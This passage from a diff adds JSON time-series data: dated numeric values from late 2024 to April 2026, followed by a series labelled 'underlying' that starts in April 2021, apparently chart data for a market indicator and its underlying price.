"2024-11-01", + 48.38078637367082 + ], + [ + "2024-11-04", + 47.058685719697905 + ], + [ + "2024-11-05", + 53.08672278290406 + ], + [ + "2024-11-06", + 62.897561462035426 + ], + [ + "2024-11-07", + 67.2842357491133 + ], + [ + "2024-11-08", + 67.59526243294756 + ], + [ + "2024-11-11", + 67.25104922061641 + ], + [ + "2024-11-12", + 66.12665775335853 + ], + [ + "2024-11-13", + 65.29256144426608 + ], + [ + "2024-11-14", + 60.834525045791445 + ], + [ + "2024-11-15", + 48.65471184888858 + ], + [ + "2024-11-18", + 51.62378720615265 + ], + [ + "2024-11-19", + 54.452013699180945 + ], + [ + "2024-11-20", + 54.16454313153157 + ], + [ + "2024-11-21", + 55.73539291663553 + ], + [ + "2024-11-22", + 56.454604113069514 + ], + [ + "2024-11-25", + 57.19436583632151 + ], + [ + "2024-11-26", + 59.701095150765624 + ], + [ + "2024-11-27", + 54.62253537476194 + ], + [ + "2024-11-29", + 58.80145353166622 + ], + [ + "2024-12-02", + 63.3455267259903 + ], + [ + "2024-12-03", + 64.54450334591655 + ], + [ + "2024-12-04", + 68.96575839758658 + ], + [ + "2024-12-05", + 66.92618660174386 + ], + [ + "2024-12-06", + 70.00292169450461 + ], + [ + "2024-12-09", + 64.34359913768566 + ], + [ + "2024-12-10", + 62.00024849248417 + ], + [ + "2024-12-11", + 68.474467902876 + ], + [ + "2024-12-12", + 64.15505938237983 + ], + [ + "2024-12-13", + 66.81183998948804 + ], + [ + "2024-12-16", + 71.17385484777476 + ], + [ + "2024-12-17", + 68.18015097101068 + ], + [ + "2024-12-18", + 49.786720240461825 + ], + [ + "2024-12-19", + 48.123157401649074 + ], + [ + "2024-12-20", + 51.52823236587836 + ], + [ + "2024-12-23", + 55.10002956419096 + ], + [ + "2024-12-24", + 59.60506714044872 + ], + [ + "2024-12-26", + 59.279779932466184 + ], + [ + "2024-12-27", + 53.16988626902337 + ], + [ + "2024-12-30", + 47.91895778840389 + ], + [ + "2024-12-31", + 44.908914316854705 + ], + [ + "2025-01-02", + 44.22587319458414 + ], + [ + "2025-01-03", + 50.936319528440116 + ], + [ + "2025-01-06", + 55.08976097225353 + ], + [ + "2025-01-07", + 48.190163043282595 + ], + [ + "2025-01-08", + 48.25732391707763 + ], + [ + "2025-01-10", + 42.88676793553009 + ], + [ + "2025-01-13", + 41.87435056800395 + ], + [ + "2025-01-14", + 41.563179870008234 + ], + [ + "2025-01-15", + 51.046757022876356 + ], + [ + "2025-01-16", + 48.41092751826029 + ], + [ + "2025-01-17", + 54.46792914214896 + ], + [ + "2025-01-21", + 56.41513632451361 + ], + [ + "2025-01-22", + 60.413128416018544 + ], + [ + "2025-01-23", + 61.06094102225298 + ], + [ + "2025-01-24", + 58.323190029610565 + ], + [ + "2025-01-27", + 46.757186120036586 + ], + [ + "2025-01-28", + 51.82767329262237 + ], + [ + "2025-01-29", + 51.15125751096234 + ], + [ + "2025-01-30", + 52.65866885061576 + ], + [ + "2025-01-31", + 52.06628180635984 + ], + [ + "2025-02-03", + 48.813858660432885 + ], + [ + "2025-02-04", + 53.56661129567868 + ], + [ + "2025-02-05", + 55.241478607698674 + ], + [ + "2025-02-06", + 57.164078105011534 + ], + [ + "2025-02-07", + 51.38951625628233 + ], + [ + "2025-02-10", + 55.9323694312528 + ], + [ + "2025-02-11", + 54.833867163494105 + ], + [ + "2025-02-12", + 55.06772387475139 + ], + [ + "2025-02-13", + 60.47045260310869 + ], + [ + "2025-02-14", + 61.92988291071324 + ], + [ + "2025-02-18", + 62.7333005021112 + ], + [ + "2025-02-19", + 62.837185037048435 + ], + [ + "2025-02-20", + 60.08431052848548 + ], + [ + "2025-02-21", + 48.86089022568415 + ], + [ + "2025-02-24", + 43.93802067223063 + ], + [ + "2025-02-25", + 39.42603073480413 + ], + [ + "2025-02-26", + 40.668159483272014 + ], + [ + "2025-02-27", + 32.41779725624686 + ], + [ + "2025-02-28", + 39.700813594418705 + ], + [ + "2025-03-03", + 34.12603356600708 + ], + [ + "2025-03-04", + 33.443835018499044 + ], + [ + "2025-03-05", + 39.09106665697801 + ], + [ + "2025-03-06", + 32.70285881902332 + ], + [ + "2025-03-07", + 35.647000142345135 + ], + [ + "2025-03-10", + 28.514553956798153 + ], + [ + "2025-03-11", + 28.154885458291446 + ], + [ + "2025-03-12", + 32.473419505626936 + ], + [ + "2025-03-13", + 29.40368242326025 + ], + [ + "2025-03-14", + 37.762913159616666 + ], + [ + "2025-03-17", + 39.86945683476126 + ], + [ + "2025-03-18", + 36.36195610893946 + ], + [ + "2025-03-19", + 40.697003921469694 + ], + [ + "2025-03-20", + 39.94480461064739 + ], + [ + "2025-03-21", + 41.08156257976712 + ], + [ + "2025-03-24", + 48.141481854130106 + ], + [ + "2025-03-25", + 49.86091209949145 + ], + [ + "2025-03-26", + 44.68652844331384 + ], + [ + "2025-03-27", + 43.21835882615324 + ], + [ + "2025-03-28", + 37.17540220890611 + ], + [ + "2025-03-31", + 37.166564083259765 + ], + [ + "2025-04-01", + 40.06334293224376 + ], + [ + "2025-04-02", + 42.661542451990684 + ], + [ + "2025-04-03", + 31.72043230393581 + ], + [ + "2025-04-04", + 24.33892172547931 + ], + [ + "2025-04-07", + 25.02365336999236 + ], + [ + "2025-04-08", + 23.32329906457055 + ], + [ + "2025-04-09", + 48.15487870264552 + ], + [ + "2025-04-10", + 42.29995599072652 + ], + [ + "2025-04-11", + 45.271924890500216 + ], + [ + "2025-04-14", + 46.38624557344851 + ], + [ + "2025-04-15", + 46.58019952071793 + ], + [ + "2025-04-16", + 42.13512248389879 + ], + [ + "2025-04-17", + 42.1100512233578 + ], + [ + "2025-04-21", + 38.70329188586758 + ], + [ + "2025-04-22", + 43.77156979286994 + ], + [ + "2025-04-23", + 47.88556492866938 + ], + [ + "2025-04-24", + 52.622280074154396 + ], + [ + "2025-04-25", + 54.43889509689157 + ], + [ + "2025-04-28", + 54.37425884346815 + ], + [ + "2025-04-29", + 55.556395559278876 + ], + [ + "2025-04-30", + 55.52659463160545 + ], + [ + "2025-05-01", + 58.03512761444411 + ], + [ + "2025-05-02", + 60.77824610178827 + ], + [ + "2025-05-05", + 59.09110318067679 + ], + [ + "2025-05-06", + 56.46035438488501 + ], + [ + "2025-05-07", + 57.316053731885695 + ], + [ + "2025-05-08", + 59.57507788292309 + ], + [ + "2025-05-09", + 59.358129357306126 + ], + [ + "2025-05-12", + 67.32029332069007 + ], + [ + "2025-05-13", + 69.80091235911256 + ], + [ + "2025-05-14", + 70.7553217012491 + ], + [ + "2025-05-15", + 70.93776439481576 + ], + [ + "2025-05-16", + 71.69193201258715 + ], + [ + "2025-05-19", + 71.86586103929517 + ], + [ + "2025-05-20", + 70.24823874054846 + ], + [ + "2025-05-21", + 63.819907575071475 + ], + [ + "2025-05-22", + 64.2872338516281 + ], + [ + "2025-05-23", + 60.139411056278185 + ], + [ + "2025-05-27", + 66.07242949566192 + ], + [ + "2025-05-28", + 64.09142246851073 + ], + [ + "2025-05-29", + 64.5961945690775 + ], + [ + "2025-05-30", + 63.81954967558235 + ], + [ + "2025-06-02", + 66.0195006098895 + ], + [ + "2025-06-03", + 68.10300195643605 + ], + [ + "2025-06-04", + 68.84251272752944 + ], + [ + "2025-06-05", + 64.4836594175183 + ], + [ + "2025-06-06", + 67.35290865309757 + ], + [ + "2025-06-09", + 67.77917357506172 + ], + [ + "2025-06-10", + 69.69651027056597 + ], + [ + "2025-06-11", + 67.47883502855896 + ], + [ + "2025-06-12", + 68.23470719884438 + ], + [ + "2025-06-13", + 60.16329782435034 + ], + [ + "2025-06-16", + 65.0360829738859 + ], + [ + "2025-06-17", + 59.4681357181466 + ], + [ + "2025-06-18", + 59.373472471787174 + ], + [ + "2025-06-20", + 57.02971061116785 + ], + [ + "2025-06-23", + 61.16981578001135 + ], + [ + "2025-06-24", + 66.40693535638536 + ], + [ + "2025-06-25", + 67.21514287686017 + ], + [ + "2025-06-26", + 70.05980879469324 + ], + [ + "2025-06-27", + 71.05922016451557 + ], + [ + "2025-06-30", + 72.90805200465547 + ], + [ + "2025-07-01", + 66.88105223845315 + ], + [ + "2025-07-02", + 69.13259569694262 + ], + [ + "2025-07-03", + 72.04422604843809 + ], + [ + "2025-07-07", + 66.79862134293784 + ], + [ + "2025-07-08", + 66.99011640036096 + ], + [ + "2025-07-09", + 69.38842626616517 + ], + [ + "2025-07-10", + 68.29515353608656 + ], + [ + "2025-07-11", + 66.53110380359769 + ], + [ + "2025-07-14", + 67.96403804061478 + ], + [ + "2025-07-15", + 68.33439269133859 + ], + [ + "2025-07-16", + 68.769088901287 + ], + [ + "2025-07-17", + 72.03945238895031 + ], + [ + "2025-07-18", + 71.07976220561991 + ], + [ + "2025-07-21", + 73.15531307866802 + ], + [ + "2025-07-22", + 67.89016259215938 + ], + [ + "2025-07-23", + 69.9332951002472 + ], + [ + "2025-07-24", + 70.86894977139642 + ], + [ + "2025-07-25", + 71.93496894638079 + ], + [ + "2025-07-28", + 73.30424334080547 + ], + [ + "2025-07-29", + 71.43813140237795 + ], + [ + "2025-07-30", + 72.09868649721457 + ], + [ + "2025-07-31", + 65.62486271169087 + ], + [ + "2025-08-01", + 48.340611692568075 + ], + [ + "2025-08-04", + 59.01509696371282 + ], + [ + "2025-08-05", + 54.47248056102701 + ], + [ + "2025-08-06", + 60.499769725230294 + ], + [ + "2025-08-07", + 61.97611634443008 + ], + [ + "2025-08-08", + 65.78501670516852 + ], + [ + "2025-08-11", + 63.58878525203717 + ], + [ + "2025-08-12", + 68.40033214079655 + ], + [ + "2025-08-13", + 68.58047159485696 + ], + [ + "2025-08-14", + 67.93343990066046 + ], + [ + "2025-08-15", + 64.23535571790643 + ], + [ + "2025-08-18", + 63.89742524404208 + ], + [ + "2025-08-19", + 53.56742430106161 + ], + [ + "2025-08-20", + 49.82298818397207 + ], + [ + "2025-08-21", + 47.07602812033418 + ], + [ + "2025-08-22", + 55.78378529786733 + ], + [ + "2025-08-25", + 53.96819123722855 + ], + [ + "2025-08-26", + 56.10355683505327 + ], + [ + "2025-08-27", + 56.930524016981394 + ], + [ + "2025-08-28", + 60.22245532172332 + ], + [ + "2025-08-29", + 52.22382935378784 + ], + [ + "2025-09-02", + 47.37498104613238 + ], + [ + "2025-09-03", + 51.85647253373401 + ], + [ + "2025-09-04", + 56.48407288325211 + ], + [ + "2025-09-05", + 57.19681021988155 + ], + [ + "2025-09-08", + 59.60874378995471 + ], + [ + "2025-09-09", + 60.990321632701374 + ], + [ + "2025-09-10", + 61.15612321569367 + ], + [ + "2025-09-11", + 64.08039257415743 + ], + [ + "2025-09-12", + 66.17370392621118 + ], + [ + "2025-09-15", + 69.85490057570362 + ], + [ + "2025-09-16", + 69.04885340566798 + ], + [ + "2025-09-17", + 67.08171613281601 + ], + [ + "2025-09-18", + 71.08188920009124 + ], + [ + "2025-09-19", + 73.69001828711816 + ], + [ + "2025-09-22", + 75.76270859309946 + ], + [ + "2025-09-23", + 69.14207926251754 + ], + [ + "2025-09-24", + 65.8867899189338 + ], + [ + "2025-09-25", + 62.03741791834571 + ], + [ + "2025-09-26", + 64.17727929177705 + ], + [ + "2025-09-29", + 66.47906845247186 + ], + [ + "2025-09-30", + 67.80295329588398 + ], + [ + "2025-10-01", + 70.04055813621473 + ], + [ + "2025-10-02", + 71.85452145621538 + ], + [ + "2025-10-03", + 67.33981185132501 + ], + [ + "2025-10-06", + 70.84446341563677 + ], + [ + "2025-10-07", + 65.4977188100716 + ], + [ + "2025-10-08", + 70.66174261235975 + ], + [ + "2025-10-09", + 69.46614110148928 + ], + [ + "2025-10-10", + 45.64021594402842 + ], + [ + "2025-10-13", + 55.36826648422727 + ], + [ + "2025-10-14", + 52.14686897948328 + ], + [ + "2025-10-15", + 55.10703062693981 + ], + [ + "2025-10-16", + 53.233059658216966 + ], + [ + "2025-10-17", + 56.07517307614311 + ], + [ + "2025-10-20", + 61.00457295561157 + ], + [ + "2025-10-21", + 60.849998879932414 + ], + [ + "2025-10-22", + 55.293982007228834 + ], + [ + "2025-10-23", + 58.79533806587004 + ], + [ + "2025-10-24", + 62.812963901358515 + ], + [ + "2025-10-27", + 68.40513419263316 + ], + [ + "2025-10-28", + 70.50443759714905 + ], + [ + "2025-10-29", + 71.69936926757204 + ], + [ + "2025-10-30", + 62.41263245911268 + ], + [ + "2025-10-31", + 63.97397515175735 + ], + [ + "2025-11-03", + 65.51160170582435 + ], + [ + "2025-11-04", + 54.778984687204265 + ], + [ + "2025-11-05", + 57.15350185254201 + ], + [ + "2025-11-06", + 49.147110598407146 + ], + [ + "2025-11-07", + 47.944714951843125 + ], + [ + "2025-11-10", + 56.04015790372853 + ], + [ + "2025-11-11", + 54.908559221999525 + ], + [ + "2025-11-12", + 54.55833581526935 + ], + [ + "2025-11-13", + 46.32440428132675 + ], + [ + "2025-11-14", + 46.63901069627934 + ], + [ + "2025-11-17", + 43.532578008492465 + ], + [ + "2025-11-18", + 39.52520991138775 + ], + [ + "2025-11-19", + 42.29596105069241 + ], + [ + "2025-11-20", + 35.34062701753068 + ], + [ + "2025-11-21", + 38.70421946281614 + ], + [ + "2025-11-24", + 48.58282191433237 + ], + [ + "2025-11-25", + 50.6979815198184 + ], + [ + "2025-11-26", + 53.659037056724706 + ], + [ + "2025-11-28", + 56.27676913343135 + ], + [ + "2025-12-01", + 54.88228149838167 + ], + [ + "2025-12-02", + 57.51490457518112 + ], + [ + "2025-12-03", + 58.338793277700546 + ], + [ + "2025-12-04", + 57.87760863041858 + ], + [ + "2025-12-05", + 59.39166764875348 + ], + [ + "2025-12-08", + 58.32500588123713 + ], + [ + "2025-12-09", + 58.835851282130825 + ], + [ + "2025-12-10", + 60.566619729744126 + ], + [ + "2025-12-11", + 58.46741072546566 + ], + [ + "2025-12-12", + 47.927424087620196 + ], + [ + "2025-12-15", + 45.645388312263734 + ], + [ + "2025-12-16", + 46.718712313938745 + ], + [ + "2025-12-17", + 38.95492024921719 + ], + [ + "2025-12-18", + 46.32459717260156 + ], + [ + "2025-12-19", + 52.01792957164541 + ], + [ + "2025-12-22", + 53.97632076831719 + ], + [ + "2025-12-23", + 55.88012968327496 + ], + [ + "2025-12-24", + 57.08011367869064 + ], + [ + "2025-12-26", + 57.043366965281 + ], + [ + "2025-12-29", + 54.207953206122276 + ], + [ + "2025-12-30", + 52.858725354108245 + ], + [ + "2025-12-31", + 48.259534402169606 + ], + [ + "2026-01-02", + 47.23093518832165 + ], + [ + "2026-01-05", + 51.762234421095435 + ], + [ + "2026-01-06", + 56.27112834701174 + ], + [ + "2026-01-07", + 56.752218554566454 + ], + [ + "2026-01-08", + 53.03476804463294 + ], + [ + "2026-01-09", + 58.171356723064214 + ], + [ + "2026-01-12", + 58.58183441197129 + ], + [ + "2026-01-13", + 57.4951320933574 + ], + [ + "2026-01-14", + 50.27091765635473 + ], + [ + "2026-01-15", + 52.41717189825848 + ], + [ + "2026-01-16", + 51.855166872142476 + ], + [ + "2026-01-20", + 40.101338146609166 + ], + [ + "2026-01-21", + 48.00503797063075 + ], + [ + "2026-01-22", + 51.74244022222434 + ], + [ + "2026-01-23", + 53.32321102231923 + ], + [ + "2026-01-26", + 55.516943519671635 + ], + [ + "2026-01-27", + 59.73421059705973 + ], + [ + "2026-01-28", + 61.194611987426235 + ], + [ + "2026-01-29", + 57.146890219924565 + ], + [ + "2026-01-30", + 50.03708543681018 + ], + [ + "2026-02-02", + 53.55208203039163 + ], + [ + "2026-02-03", + 45.744041529625555 + ], + [ + "2026-02-04", + 38.90501445378359 + ], + [ + "2026-02-05", + 34.41824812746897 + ], + [ + "2026-02-06", + 44.41020883370859 + ], + [ + "2026-02-09", + 47.59226050349218 + ], + [ + "2026-02-10", + 45.86671730393649 + ], + [ + "2026-02-11", + 47.05627408716366 + ], + [ + "2026-02-12", + 39.88024403635974 + ], + [ + "2026-02-13", + 40.87691119418792 + ], + [ + "2026-02-17", + 40.52642540467996 + ], + [ + "2026-02-18", + 44.253930790987184 + ], + [ + "2026-02-19", + 42.762574443143784 + ], + [ + "2026-02-20", + 47.175308112115886 + ], + [ + "2026-02-23", + 42.3076257518347 + ], + [ + "2026-02-24", + 47.40917120696723 + ], + [ + "2026-02-25", + 53.45407788452716 + ], + [ + "2026-02-26", + 48.39510956727154 + ], + [ + "2026-02-27", + 47.13593167230856 + ], + [ + "2026-03-02", + 47.73672697709689 + ], + [ + "2026-03-03", + 43.413082513188364 + ], + [ + "2026-03-04", + 50.248685412076135 + ], + [ + "2026-03-05", + 48.97034188998492 + ], + [ + "2026-03-06", + 43.093125781926695 + ], + [ + "2026-03-09", + 48.871743190578556 + ], + [ + "2026-03-10", + 48.87873810965169 + ], + [ + "2026-03-11", + 48.821324909935186 + ], + [ + "2026-03-12", + 41.90931224473044 + ], + [ + "2026-03-13", + 39.84724963770871 + ], + [ + "2026-03-16", + 45.300153835914074 + ], + [ + "2026-03-17", + 47.552715000516 + ], + [ + "2026-03-18", + 42.18317713923117 + ], + [ + "2026-03-19", + 41.06679191351105 + ], + [ + "2026-03-20", + 35.21569411106644 + ], + [ + "2026-03-23", + 40.757175855514426 + ], + [ + "2026-03-24", + 38.614315346979105 + ], + [ + "2026-03-25", + 41.76403483407432 + ], + [ + "2026-03-26", + 34.74864717524535 + ], + [ + "2026-03-27", + 30.360436752089555 + ], + [ + "2026-03-30", + 28.85514523371232 + ], + [ + "2026-03-31", + 42.378276590573975 + ], + [ + "2026-04-01", + 46.50901693951276 + ], + [ + "2026-04-02", + 46.89426605454897 + ], + [ + "2026-04-06", + 48.97358982228716 + ], + [ + "2026-04-07", + 49.0285590081952 + ], + [ + "2026-04-08", + 58.408137269784625 + ], + [ + "2026-04-09", + 60.25350589445984 + ], + [ + "2026-04-10", + 60.656994053677586 + ], + [ + "2026-04-13", + 63.521111039320864 + ], + [ + "2026-04-14", + 67.97449735409536 + ], + [ + "2026-04-15", + 70.9705737683581 + ], + [ + "2026-04-16", + 71.95622612866393 + ], + [ + "2026-04-17", + 74.50130606907018 + ], + [ + "2026-04-20", + 72.75337133796924 + ], + [ + "2026-04-21", + 70.62253156049925 + ], + [ + "2026-04-22", + 74.18999633329594 + ], + [ + "2026-04-23", + 71.01117668467205 + ] + ], + "underlying": [ + [ + "2021-04-26", + 26.557361602783203 + ], + [ + "2021-04-27", + 26.208740234375 + ], + [ + "2021-04-28", + 25.93891143798828 + ], + [ + "2021-04-29", + 26.199188232421875 + ], + [ + "2021-04-30", + 25.707298278808594 + ], + [ + "2021-05-03", + 25.28704071044922 + ], + [ + "2021-05-04", + 23.954635620117188 + ], + [ + "2021-05-05", + 23.675264358520508 + ], + [ + "2021-05-06", + 24.193416595458984 + ], + [ + "2021-05-07", + 24.785602569580078 + ], + [ + "2021-05-10", + 22.923093795776367 + ], + [ + "2021-05-11", + 22.808481216430664 + ], + [ + "2021-05-12", + 21.07253074645996 + ], + [ + "2021-05-13", + 21.516666412353516 + ], + [ + "2021-05-14", + 22.91592788696289 + ], + [ + "2021-05-17", + 22.529104232788086 + ], + [ + "2021-05-18", + 22.056316375732422 + ], + [ + "2021-05-19", + 22.137500762939453 + ], + [ + "2021-05-20", + 23.417375564575195 + ], + [ + "2021-05-21", + 23.030542373657227 + ], + [ + "2021-05-24", + 24.18386459350586 + ], + [ + "2021-05-25", + 24.30086898803711 + ], + [ + "2021-05-26", + 24.54681396484375 + ], + [ + "2021-05-27", + 24.260272979736328 + ], + [ + "2021-05-28", + 24.49666976928711 + ], + [ + "2021-06-01", + 24.25788688659668 + ], + [ + "2021-06-02", + 24.38444709777832 + ], + [ + "2021-06-03", + 23.617956161499023 + ], + [ + "2021-06-04", + 24.82857894897461 + ], + [ + "2021-06-07", + 25.04825782775879 + ], + [ + "2021-06-08", + 25.07691192626953 + ], + [ + "2021-06-09", + 25.105566024780273 + ], + [ + "2021-06-10", + 25.87445068359375 + ], + [ + "2021-06-11", + 26.079797744750977 + ], + [ + "2021-06-14", + 26.81047248840332 + ], + [ + "2021-06-15", + 26.31380271911621 + ], + [ + "2021-06-16", + 26.03203773498535 + ], + [ + "2021-06-17", + 27.00388526916504 + ], + [ + "2021-06-18", + 26.359169006347656 + ], + [ + "2021-06-21", + 26.841508865356445 + ], + [ + "2021-06-22", + 27.591289520263672 + ], + [ + "2021-06-23", + 27.63904571533203 + ], + [ + "2021-06-24", + 28.147647857666016 + ], + [ + "2021-06-25", + 28.05929946899414 + ], + [ + "2021-06-28", + 29.052635192871094 + ], + [ + "2021-06-29", + 29.37976837158203 + ], + [ + "2021-06-30", + 29.25082778930664 + ], + [ + "2021-07-01", + 29.265151977539062 + ], + [ + "2021-07-02", + 30.258481979370117 + ], + [ + "2021-07-06", + 30.66441535949707 + ], + [ + "2021-07-07", + 30.86021614074707 + ], + [ + "2021-07-08", + 30.325345993041992 + ], + [ + "2021-07-09", + 30.838727951049805 + ], + [ + "2021-07-12", + 31.225557327270508 + ], + [ + "2021-07-13", + 31.20883560180664 + ], + [ + "2021-07-14", + 31.378379821777344 + ], + [ + "2021-07-15", + 30.72888946533203 + ], + [ + "2021-07-16", + 29.97433090209961 + ], + [ + "2021-07-19", + 29.255599975585938 + ], + [ + "2021-07-20", + 30.22027587890625 + ], + [ + "2021-07-21", + 30.91036033630371 + ], + [ + "2021-07-22", + 31.55984878540039 + ], + [ + "2021-07-23", + 32.608097076416016 + ], + [ + "2021-07-26", + 32.74421310424805 + ], + [ + "2021-07-27", + 31.674463272094727 + ], + [ + "2021-07-28", + 32.020694732666016 + ], + [ + "2021-07-29", + 32.17830276489258 + ], + [ + "2021-07-30", + 31.695955276489258 + ], + [ + "2021-08-02", + 31.6864013671875 + ], + [ + "2021-08-03", + 32.23799514770508 + ], + [ + "2021-08-04", + 32.397979736328125 + ], + [ + "2021-08-05", + 33.00686264038086 + ], + [ + "2021-08-06", + 32.577056884765625 + ], + [ + "2021-08-09", + 32.751373291015625 + ], + [ + "2021-08-10", + 32.261871337890625 + ], + [ + "2021-08-11", + 32.08756637573242 + ], + [ + "2021-08-12", + 32.421852111816406 + ], + [ + "2021-08-13", + 32.7465934753418 + ], + [ + "2021-08-16", + 32.80390167236328 + ], + [ + "2021-08-17", + 31.9419002532959 + ], + [ + "2021-08-18", + 31.013042449951172 + ], + [ + "2021-08-19", + 31.45478057861328 + ], + [ + "2021-08-20", + 32.42662811279297 + ], + [ + "2021-08-23", + 33.87126159667969 + ], + [ + "2021-08-24", + 34.20555877685547 + ], + [ + "2021-08-25", + 34.24375915527344 + ], + [ + "2021-08-26", + 33.66352081298828 + ], + [ + "2021-08-27", + 34.64730453491211 + ], + [ + "2021-08-30", + 35.79584884643555 + ], + [ + "2021-08-31", + 35.69554901123047 + ], + [ + "2021-09-01", + 35.891361236572266 + ], + [ + "2021-09-02", + 35.841217041015625 + ], + [ + "2021-09-03", + 36.16357421875 + ], + [ + "2021-09-07", + 36.311614990234375 + ], + [ + "2021-09-08", + 35.939117431640625 + ], + [ + "2021-09-09", + 35.5546760559082 + ], + [ + "2021-09-10", + 34.75475311279297 + ], + [ + "2021-09-13", + 34.67595672607422 + ], + [ + "2021-09-14", + 34.377479553222656 + ], + [ + "2021-09-15", + 35.139190673828125 + ], + [ + "2021-09-16", + 35.20844268798828 + ], + [ + "2021-09-17", + 33.96438980102539 + ], + [ + "2021-09-20", + 31.875041961669922 + ], + [ + "2021-09-21", + 31.915637969970703 + ], + [ + "2021-09-22", + 32.84927749633789 + ], + [ + "2021-09-23", + 33.76142501831055 + ], + [ + "2021-09-24", + 33.85693359375 + ], + [ + "2021-09-27", + 33.04029846191406 + ], + [ + "2021-09-28", + 30.284751892089844 + ], + [ + "2021-09-29", + 30.08417510986328 + ], + [ + "2021-09-30", + 29.74510955810547 + ], + [ + "2021-10-01", + 30.287137985229492 + ], + [ + "2021-10-04", + 28.424638748168945 + ], + [ + "2021-10-05", + 29.518260955810547 + ], + [ + "2021-10-06", + 30.10089111328125 + ], + [ + "2021-10-07", + 30.915136337280273 + ], + [ + "2021-10-08", + 30.439964294433594 + ], + [ + "2021-10-11", + 29.764209747314453 + ], + [ + "2021-10-12", + 29.46095085144043 + ], + [ + "2021-10-13", + 30.15103530883789 + ], + [ + "2021-10-14", + 31.815349578857422 + ], + [ + "2021-10-15", + 32.4051399230957 + ], + [ + "2021-10-18", + 33.37697982788086 + ], + [ + "2021-10-19", + 34.110042572021484 + ], + [ + "2021-10-20", + 34.002586364746094 + ], + [ + "2021-10-21", + 34.611488342285156 + ], + [ + "2021-10-22", + 33.73516082763672 + ], + [ + "2021-10-25", + 34.747589111328125 + ], + [ + "2021-10-26", + 35.07234191894531 + ], + [ + "2021-10-27", + 35.34932327270508 + ], + [ + "2021-10-28", + 36.509803771972656 + ], + [ + "2021-10-29", + 37.04945373535156 + ], + [ + "2021-11-01", + 37.41478729248047 + ], + [ + "2021-11-02", + 37.91384506225586 + ], + [ + "2021-11-03", + 39.11731719970703 + ], + [ + "2021-11-04", + 40.576271057128906 + ], + [ + "2021-11-05", + 40.72669982910156 + ], + [ + "2021-11-08", + 40.559547424316406 + ], + [ + "2021-11-09", + 39.72381591796875 + ], + [ + "2021-11-10", + 37.98310089111328 + ], + [ + "2021-11-11", + 38.291114807128906 + ], + [ + "2021-11-12", + 39.50651931762695 + ], + [ + "2021-11-15", + 39.49457931518555 + ], + [ + "2021-11-16", + 40.311222076416016 + ], + [ + "2021-11-17", + 40.358978271484375 + ], + [ + "2021-11-18", + 41.59347915649414 + ], + [ + "2021-11-19", + 42.29788589477539 + ], + [ + "2021-11-22", + 40.831756591796875 + ], + [ + "2021-11-23", + 40.27539825439453 + ], + [ + "2021-11-24", + 40.64790344238281 + ], + [ + "2021-11-26", + 38.405738830566406 + ], + [ + "2021-11-29", + 40.791175842285156 + ], + [ + "2021-11-30", + 39.038509368896484 + ], + [ + "2021-12-01", + 37.03513717651367 + ], + [ + "2021-12-02", + 37.73236846923828 + ], + [ + "2021-12-03", + 35.8364372253418 + ], + [ + "2021-12-06", + 36.674564361572266 + ], + [ + "2021-12-07", + 39.98170471191406 + ], + [ + "2021-12-08", + 40.53806686401367 + ], + [ + "2021-12-09", + 38.78778839111328 + ], + [ + "2021-12-10", + 39.988868713378906 + ], + [ + "2021-12-13", + 38.26963806152344 + ], + [ + "2021-12-14", + 37.130638122558594 + ], + [ + "2021-12-15", + 39.58770751953125 + ], + [ + "2021-12-16", + 36.56711959838867 + ], + [ + "2021-12-17", + 36.00836181640625 + ], + [ + "2021-12-20", + 34.931453704833984 + ], + [ + "2021-12-21", + 37.26674270629883 + ], + [ + "2021-12-22", + 38.596771240234375 + ], + [ + "2021-12-23", + 39.51368713378906 + ], + [ + "2021-12-27", + 41.4024543762207 + ], + [ + "2021-12-28", + 40.915340423583984 + ], + [ + "2021-12-29", + 40.85087203979492 + ], + [ + "2021-12-30", + 40.46881866455078 + ], + [ + "2021-12-31", + 39.716644287109375 + ], + [ + "2022-01-03", + 40.8628044128418 + ], + [ + "2022-01-04", + 39.27489471435547 + ], + [ + "2022-01-05", + 35.66212844848633 + ], + [ + "2022-01-06", + 35.56423568725586 + ], + [ + "2022-01-07", + 34.401363372802734 + ], + [ + "2022-01-10", + 34.52791213989258 + ], + [ + "2022-01-11", + 36.04656982421875 + ], + [ + "2022-01-12", + 36.457271575927734 + ], + [ + "2022-01-13", + 33.811561584472656 + ], + [ + "2022-01-14", + 34.32255935668945 + ], + [ + "2022-01-18", + 31.84878158569336 + ], + [ + "2022-01-19", + 30.74082374572754 + ], + [ + "2022-01-20", + 29.55168914794922 + ], + [ + "2022-01-21", + 27.063579559326172 + ], + [ + "2022-01-24", + 27.455183029174805 + ], + [ + "2022-01-25", + 25.430309295654297 + ], + [ + "2022-01-26", + 25.38255500793457 + ], + [ + "2022-01-27", + 24.62322425842285 + ], + [ + "2022-01-28", + 26.92030906677246 + ], + [ + "2022-01-31", + 29.527812957763672 + ], + [ + "2022-02-01", + 30.091341018676758 + ], + [ + "2022-02-02", + 30.802907943725586 + ], + [ + "2022-02-03", + 27.097007751464844 + ], + [ + "2022-02-04", + 28.033035278320312 + ], + [ + "2022-02-07", + 27.397878646850586 + ], + [ + "2022-02-08", + 28.329124450683594 + ], + [ + "2022-02-09", + 30.086565017700195 + ], + [ + "2022-02-10", + 28.090343475341797 + ], + [ + "2022-02-11", + 25.444637298583984 + ], + [ + "2022-02-14", + 25.51626968383789 + ], + [ + "2022-02-15", + 27.36444854736328 + ], + [ + "2022-02-16", + 27.35967254638672 + ], + [ + "2022-02-17", + 24.93364143371582 + ], + [ + "2022-02-18", + 24.088354110717773 + ], + [ + "2022-02-22", + 23.343353271484375 + ], + [ + "2022-02-23", + 21.55725860595703 + ], + [ + "2022-02-24", + 23.668094635009766 + ], + [ + "2022-02-25", + 24.790374755859375 + ], + [ + "2022-02-28", + 25.05303192138672 + ], + [ + "2022-03-01", + 23.89733123779297 + ], + [ + "2022-03-02", + 25.03870964050293 + ], + [ + "2022-03-03", + 23.992839813232422 + ], + [ + "2022-03-04", + 22.96607780456543 + ], + [ + "2022-03-07", + 20.40155601501465 + ], + [ + "2022-03-08", + 20.119792938232422 + ], + [ + "2022-03-09", + 22.273605346679688 + ], + [ + "2022-03-10", + 21.55725860595703 + ], + [ + "2022-03-11", + 20.220081329345703 + ], + [ + "2022-03-14", + 19.035720825195312 + ], + [ + "2022-03-15", + 20.797931671142578 + ], + [ + "2022-03-16", + 23.13322639465332 + ], + [ + "2022-03-17", + 23.906883239746094 + ], + [ + "2022-03-18", + 25.392105102539062 + ], + [ + "2022-03-21", + 25.210630416870117 + ], + [ + "2022-03-22", + 26.70063018798828 + ], + [ + "2022-03-23", + 25.573575973510742 + ], + [ + "2022-03-24", + 27.23072624206543 + 